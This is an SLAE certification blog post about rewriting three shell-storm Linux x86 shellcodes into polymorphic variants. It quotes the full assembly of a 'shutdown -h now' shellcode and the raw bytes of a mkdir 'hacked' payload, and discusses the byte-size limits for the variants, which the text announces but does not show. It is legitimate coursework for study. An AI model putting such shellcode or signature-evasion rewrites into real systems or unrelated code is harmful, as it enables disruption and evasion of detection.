0x06 SLAE - Polymorphic versions

First sample from shell-storm

Original shellcode

shellcode-876.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start

_start:
  xor    eax,eax
  xor    edx,edx
  push   eax
  push   0x682d
  mov    edi,esp
  push   eax
  push   0x6e
  mov    WORD [esp+0x1],0x776f
  mov    edi,esp
  push   eax
  push   0x6e776f64
  push   0x74756873
  push   0x2f2f2f6e
  push   0x6962732f
  mov    ebx,esp
  push   edx
  push   esi
  push   edi
  push   ebx
  mov    ecx,esp
  mov    al,0xb
  int    0x80

The original shellcode has 56 bytes. The file can be accessed here http://shell-storm.org/shellcode/files/shellcode-876.php

Polymorphic shellcode version

Has we can see on the following block of code below, there is some modification of the assembly which give a different shellcode but give the same result. The modified versions have 69 bytes. So, this is less than the 150% of the original shellcode. The maximum allowed for the assignment of this sample is 84 bytes.

The shellcode is :

Here is also a simple demo of the shellcode generation and execution.

Second sample from shell-storm

Original Shellcode

The original shellcode have 21 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-752.php

Polymorphic shellcode version

The polymorphic version have 30 bytes which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there is less possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.

Here is the shellcode:

Third sample from shell-storm

Orignal shellcode

The sample can be accessed from shell storm: http://shell-storm.org/shellcode/files/shellcode-542.php

The author only gave the shellcode. So, for the purpose of the SLAE, we will get the assembly of that shellcode for better understanding and be able to create a polymorphic version of it.

echo -ne "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23" >shellcode542

ndisasm -b32 shellcode542

The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.

Polymorphic shellcode version

I realized that a lot of the assembly in the original one can be modified to do a different version of it. Let's keep it simple. Basically, the shellcode will create a mkdir folder with the name "hacked" with the right 775.

My final assembly polymorphic shellcode is pretty different but does the same thing.

The polymorphic version have 28 bytes. So, it's smaller then the original one which is great.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1374

Previous0x05 SLAE - Msfvenom samplesNext0x07 SLAE - Custom Crypter

Last updated

Was this helpful?